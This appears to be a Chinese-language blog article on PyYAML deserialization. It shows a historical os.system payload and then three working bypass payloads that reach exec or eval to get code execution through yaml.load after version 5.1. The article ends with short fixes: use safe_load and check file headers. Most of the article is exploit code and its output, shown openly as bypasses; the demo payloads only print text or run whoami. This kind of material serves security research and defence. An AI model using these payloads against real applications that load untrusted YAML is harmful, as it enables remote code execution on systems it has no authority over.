PyYAML反序列化防御和ByPass是怎么樣的

這篇文章將為大家詳細講解有關PyYAML反序列化防御和ByPass是怎么樣的，文章內容質量較高，因此小編分享給大家做個參考，希望大家閱讀完這篇文章后對相關知識有一定的了解。

PyYAML介紹

PyYAML是Python出眾的模塊之一。PyYAML就是python的一個yaml庫yaml格式的語言都會有自己的實現來進行yaml格式的解析（讀取和保存）。若對于Python反序列化有所了解一定會聽說過它。

PyYAML歷史漏洞和修復

它的反序列化漏洞使得大多數Python安全研究人員對齊記憶猶新。

當咱們使用反序列化時候會使用如下的載荷：

!!python/object/new:os.system ["whoami"]

并且使用load()進行加載時PyYAML將會執行os.system("whoami")。這樣會導致命令執行，從而輸出用戶名。

該漏洞在5.1+版本之中得到修復，如果依然使用歷史漏洞載荷，將會得到錯誤提示的告警。

while constructing a Python instance
expected a class, but found <class 'builtin_function_or_method'>
  in "<unicode string>", line 1, column 1:
    !!python/object/new:os.system [" ... 
    ^

這樣因為只能反序列化部分基本類型，極大程度上緩解了反序列化漏洞帶來的影響。

PyYAML ByPass

當咱們回看部分基本類型時，將會注意到Python內置方法exec、eval。在手冊之中有這樣一段描述。

exec 執行儲存在字符串或文件中的Python語句，相比于 eval，exec可以執行更復雜的 Python 代碼。

如此能夠得到ByPass載荷。

PayLoad1:

import yaml

payload = """
- !!python/object/new:str
    args: []
    state: !!python/tuple
    - "print('漏洞存在')"
    - !!python/object/new:staticmethod
      args: [0]
      state:
        update: !!python/name:exec
"""
yaml.load(payload)

回顯：
->漏洞存在

PayLoad2:

import yaml

payload = """
!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "print('漏洞存在')"
"""
yaml.load(payload)

回顯：
->漏洞存在

PayLoad3:

import yaml

payload = """
!!python/object/new:tuple 
- !!python/object/new:map 
  - !!python/name:eval
  - [ print('漏洞存在') ]
"""
yaml.load(payload)

回顯：
->漏洞存在

這三種載荷均是利用基本類型之中代碼執行函數，從而繞過5.1+的防御措施。

修復方法

1、按照官方推薦使用safe_load對于序列化內容進行加載。

2、檢測加載文件頭防止加載代碼執行函數。

關于PyYAML反序列化防御和ByPass是怎么樣的就分享到這里了，希望以上內容可以對大家有一定的幫助，可以學到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。